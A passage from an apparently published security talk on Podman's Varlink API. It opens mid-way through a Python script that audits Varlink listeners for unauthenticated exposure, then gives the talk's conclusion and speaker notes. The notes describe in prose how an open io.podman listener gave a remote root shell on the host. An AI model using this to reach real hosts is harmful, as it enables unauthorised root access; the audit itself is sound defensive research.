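    """True for 127.0.0.0/8, ::1 and the literal name localhost."""
    host = host.strip("[]")
    try:
        return ipaddress.ip_address(host).is_loopback
    except ValueError:
        return host == "localhost"


def classify_listener(address, socket_mode=None, owner_uid=None):
    """Return (exposure, reason) for one Varlink listener address.

    exposure: 'remote'     anyone who can reach the port can call io.podman (slide 42)
              'local'      any local user can call it (slides 40 and 41)
              'restricted' unix socket whose mode keeps other users out
    socket_mode is the permission bits of a unix socket (e.g. 0o660) and owner_uid its
    owner; both are ignored for tcp addresses. Connecting to a unix socket needs write
    permission on it, so the write bits decide who gets in."""
    kind, _, rest = address.partition(":")
    if kind == "tcp":
        host, _, port = rest.rpartition(":")
        if not host or not port.isdigit():
            raise ValueError("tcp address must be tcp:HOST:PORT, got %r" % address)
        if _is_loopback(host):
            return "local", "loopback TCP listener %s: any local user gets command execution, no auth" % rest
        return "remote", "network TCP listener %s: remote command execution, no auth" % rest
    if kind != "unix" or not rest.startswith("/"):
        raise ValueError("unsupported Varlink address %r" % address)
    if socket_mode is None:
        return "local", "unix socket %s: mode unknown, verify it is not world-writable" % rest
    if socket_mode & stat.S_IWOTH:
        exposure = "local"
        reason = "unix socket %s mode %o is world-writable: any local user can call the API" % (rest, socket_mode)
    elif socket_mode & stat.S_IWGRP:
        exposure = "restricted"
        reason = "unix socket %s mode %o: only the owner and group can connect" % (rest, socket_mode)
    else:
        exposure = "restricted"
        reason = "unix socket %s mode %o: only the owner can connect" % (rest, socket_mode)
    if rest.startswith("/tmp/"):
        reason += "; socket lives in /tmp rather than the locked-down /run"
    if owner_uid == 0 and exposure == "local":
        reason += "; the service runs as root, so callers get root on the host"
    return exposure, reason


def audit_unix_socket(path):
    """Stat a live socket file and classify it; mode and owner come from the filesystem."""
    st = os.stat(path)
    if not stat.S_ISSOCK(st.st_mode):
        raise ValueError("%s is not a unix socket" % path)
    return classify_listener("unix:" + path, stat.S_IMODE(st.st_mode), st.st_uid)


def demo_tmp_socket():
    """Offline demonstration: bind a throwaway socket, loosen it to 0666 the way an
    open-ACL deployment would, and audit it."""
    tmpdir = tempfile.mkdtemp()
    path = os.path.join(tmpdir, "io.podman")
    srv = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
    try:
        srv.bind(path)
        os.chmod(path, 0o666)
        return audit_unix_socket(path)
    finally:
        srv.close()
        os.unlink(path)
        os.rmdir(tmpdir)


# Constructed sample configurations taken from the insecure-config slides; the
# /run/podman path is illustrative.
SAMPLE_LISTENERS = [
    ("unix:/run/blah", 0o666, 0),          # slide 40: open-ACL unix socket, service as root
    ("tcp:127.0.0.1:6000", None, None),    # slide 41: loopback
    ("tcp:0.0.0.0:6000", None, None),      # slide 42: network
    ("unix:/run/podman/io.podman", 0o660, 0),
]

if __name__ == "__main__":
    for addr, mode, uid in SAMPLE_LISTENERS:
        print("%-10s %s" % classify_listener(addr, mode, uid))
    print("%-10s %s" % demo_tmp_socket())
```

On a real host, feed it the socket paths `lsof -U` turns up and the addresses from any `podman varlink` command lines; anything classified `remote` is the plain-TCP deployment slide 74 says not to run, and anything `local` on a root-owned socket is the slide 32 case where every local user is root.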
75. Conclusion
• Varlink and Podman are still pretty new and need more research
• Security maturity will come with time, hardening efforts and more audits
• Code to test the found issues to be released shortly
• Things can only get better
• For now, if you're building systems with them, remember to isolate + auth
• More fixes and better security documentation to come
• https://github.com/containers/libpod/commits/master
Reference: https://github.com/containers/libpod/commit/080abfd22228bcc2b254d76aea0636642dd6bccd

Editor's notes

  1. Some people really like titles and stuff
  2. Tommy Boy reference
  3. Start a server listening on a local socket, loopback or on the network
  4. Like Docker… same CLI, but different design. Written in Go, at least libpod is Go
  5. 1.4.4-4.fc30 1.5.1-3.fc30
  6. Sudo make me a sandwich, cool
  7. Could be listening as root, could be any user as long as they have bind perms for that port
  8. So either way, not a small number of target APIs
  9. Now there’s some python libraries to help
  10. Or just command line
  11. Container metadata basically
  12. Even though we're running commands on the host and not in a container, it's already started setting up the environment for a container. And since I didn't mount a fs/volume/etc, it's probably just dropping us into the host filesystem
  13. Slight difference
  14. Slight difference
  15. Run the server
  16. Issue the call as a remote client
  17. To make sure it’s available locally for Podman to use
  18. Now we’ve pulled down a container image, ran a label and got a root shell all remotely
  19. In case that wasn’t clear already
  20. Some documentation suggests unrestricted access when setting up varlink server instances…
  21. So we can exploit Podman via Gopodman’s documented insecure config
  22. Creates tunnel for stdin/stdout to call methods
  23. It’s a protocol, auth is left to whoever is deploying it… not saying that’s right or wrong
  24. Searching the libpod github for API issues
  25. Haven’t dug into the upgraded connection ones, but there’s probably some interesting stuff there too
  26. If you’re talking to a registry, it also tries to look for certs on the local filesystem
  27. If you import code from somewhere else, it’s now “your code” Reference: https://github.com/containers/libpod/blob/master/vendor/modules.txt
  28. But there’s definitely a lack of input validation and trusting parameters coming in that allows unintended things like this to happen
  29. /dev/null is not the problem here, some buffer calculation error probably, but unlikely a buffer overflow cause it's in Go and it's a panic on some null ptr thing. We can attach to podman with gdb here but… it's a little awkward and I guess has a learning curve to use on Go compiled code
  30. Uhhh… is it supposed to be removing "similar" names or just exact ones? Also, an empty volume name removes the first one in alphabetical order?? Might be a functional bug here if nothing else. If you CreateVolumes, I'm pretty sure it doesn't start making them in alphabetical order…
  31. Again, this stuff is new
  32. “It’s always a good time to get pickled” – sorry, inside joke
  33. But that’s ok, we’ll do it live
  34. Again this is a shell on the host, not the container, probably due to us not mounting volumes or anything when we’re running the label within the container execution environment
  35. So how do you find varlink services
  36. Check out all the methods a service exposes
  37. This *may* be the first security talk on either of them, and I hope this has been helpful, but I also hope it's not the last